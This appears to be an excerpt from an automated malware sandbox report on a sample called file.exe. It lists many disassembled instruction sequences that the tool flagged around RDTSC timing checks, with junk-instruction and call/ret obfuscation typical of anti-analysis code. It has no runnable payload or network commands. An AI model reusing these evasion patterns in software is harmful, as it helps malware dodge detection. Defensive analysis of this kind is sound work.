            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C2A5 second address: 88C31A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnp 00007F84084B162Eh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F84084B1628h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1E19h], edi 0x0000002f push 00000000h 0x00000031 xor edi, 08A07CE6h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F84084B1628h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 jg 00007F84084B1626h 0x00000059 push eax 0x0000005a push esi 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D3F1 second address: 88D3F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A6B5 second address: 88A6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B591 second address: 88B595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889755 second address: 889777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B1638h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B595 second address: 88B599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E340 second address: 88E355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B599 second address: 88B5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E355 second address: 88E398 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84084B162Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D1E1Eh] 0x00000013 push 00000000h 0x00000015 or edi, 0971E24Ch 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+122D1E4Ah], ebx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnc 00007F84084B1637h 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888709 second address: 888721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DB3h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D5F9 second address: 88D5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D5FD second address: 88D601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F3A2 second address: 88F3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F3A6 second address: 88F41A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F8408BD9DA8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 adc edi, 0E1B725Ah 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F8408BD9DA8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edi, ecx 0x00000048 push 00000000h 0x0000004a mov ebx, dword ptr [ebp+122D1F83h] 0x00000050 mov dword ptr [ebp+122D3322h], edx 0x00000056 push eax 0x00000057 jc 00007F8408BD9DBFh 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F41A second address: 88F41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F554 second address: 88F55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F55B second address: 88F576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84084B1636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894592 second address: 8945BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F8408BD9DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F8408BD9DACh 0x00000012 pop eax 0x00000013 push esi 0x00000014 push eax 0x00000015 jmp 00007F8408BD9DACh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897842 second address: 897848 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897848 second address: 89784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897B7D second address: 897B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F84084B1626h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897B87 second address: 897B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BF85 second address: 89BFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F84084B1626h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84084B162Fh 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BFA4 second address: 89BFA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BFA8 second address: 89BFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84084B1636h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BFCB second address: 89BFFB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8408BD9DA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f jmp 00007F8408BD9DAEh 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007F8408BD9DACh 0x00000021 jo 00007F8408BD9DA6h 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C2E0 second address: 89C30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push esi 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 pop esi 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jnp 00007F84084B1628h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C30B second address: 89C335 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8408BD9DA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8408BD9DB8h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A33E9 second address: 8A3413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 jnc 00007F84084B163Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3413 second address: 8A3417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3417 second address: 8A341B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A341B second address: 8A342A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A342A second address: 8A342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A342E second address: 8A3458 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F8408BD9DB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8408BD9DB2h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3458 second address: 8A345D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8D00 second address: 8A8D26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8408BD9DB3h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8294AA second address: 8294B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87313A second address: 87313E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8731F9 second address: 873241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 48316D9Fh 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F84084B1628h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov ecx, esi 0x00000029 push 3D5ADBF3h 0x0000002e push eax 0x0000002f push edx 0x00000030 jg 00007F84084B1633h 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873364 second address: 873368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873368 second address: 87339D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xchg eax, esi 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F84084B1628h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 add ecx, dword ptr [ebp+122D29D9h] 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87339D second address: 8733A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8733A1 second address: 8733A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8733A7 second address: 8733C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408BD9DB8h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873598 second address: 87359C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873714 second address: 873725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jp 00007F8408BD9DB4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873725 second address: 873729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873D98 second address: 873E24 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F8408BD9DA8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov edx, dword ptr [ebp+1244AB8Fh] 0x00000027 lea eax, dword ptr [ebp+1247792Ch] 0x0000002d pushad 0x0000002e mov ebx, eax 0x00000030 add dword ptr [ebp+122D2CF8h], ecx 0x00000036 popad 0x00000037 push eax 0x00000038 push esi 0x00000039 jnl 00007F8408BD9DACh 0x0000003f pop esi 0x00000040 mov dword ptr [esp], eax 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007F8408BD9DA8h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 00000014h 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d lea eax, dword ptr [ebp+124778E8h] 0x00000063 mov ecx, dword ptr [ebp+122D3BB9h] 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F8408BD9DAFh 0x00000073 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873E24 second address: 873E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873E28 second address: 873E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7FBD second address: 8A7FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7FC3 second address: 8A7FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8408BD9DA6h 0x0000000a popad 0x0000000b pop edx 0x0000000c jo 00007F8408BD9DD0h 0x00000012 pushad 0x00000013 jmp 00007F8408BD9DB6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8170 second address: 8A8174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8174 second address: 8A8195 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8408BD9DA6h 0x00000008 jmp 00007F8408BD9DB3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8195 second address: 8A8199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8199 second address: 8A81BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A81BA second address: 8A81BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8452 second address: 8A845B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE7FF second address: 8AE805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE805 second address: 8AE80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE80B second address: 8AE810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE810 second address: 8AE81C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD272 second address: 8AD27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD27C second address: 8AD280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD280 second address: 8AD2A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1632h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F84084B1626h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD2A1 second address: 8AD2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD404 second address: 8AD414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F84084B1626h 0x0000000a jp 00007F84084B1626h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADE22 second address: 8ADE26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADE26 second address: 8ADE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADF89 second address: 8ADF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8408BD9DA6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADF97 second address: 8ADFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F84084B1626h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADFA2 second address: 8ADFA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE130 second address: 8AE15D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84084B1636h 0x00000008 jmp 00007F84084B1630h 0x0000000d pushad 0x0000000e jmp 00007F84084B1632h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B19DC second address: 8B19E6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8408BD9DAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B19E6 second address: 8B1A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F84084B1641h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1A17 second address: 8B1A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1A20 second address: 8B1A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D661 second address: 83D67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408BD9DB6h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B61D4 second address: 8B61D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B61D8 second address: 8B6216 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8408BD9DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8408BD9DB7h 0x00000010 jl 00007F8408BD9DA6h 0x00000016 jmp 00007F8408BD9DB5h 0x0000001b popad 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6216 second address: 8B622C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84084B1631h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B64D5 second address: 8B64FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8408BD9DADh 0x00000008 jmp 00007F8408BD9DB7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B67A0 second address: 8B67CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B1635h 0x00000009 popad 0x0000000a jnl 00007F84084B1628h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B67CB second address: 8B67D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B67D9 second address: 8B67E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5EE0 second address: 8B5EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5EE4 second address: 8B5EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6D1F second address: 8B6D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
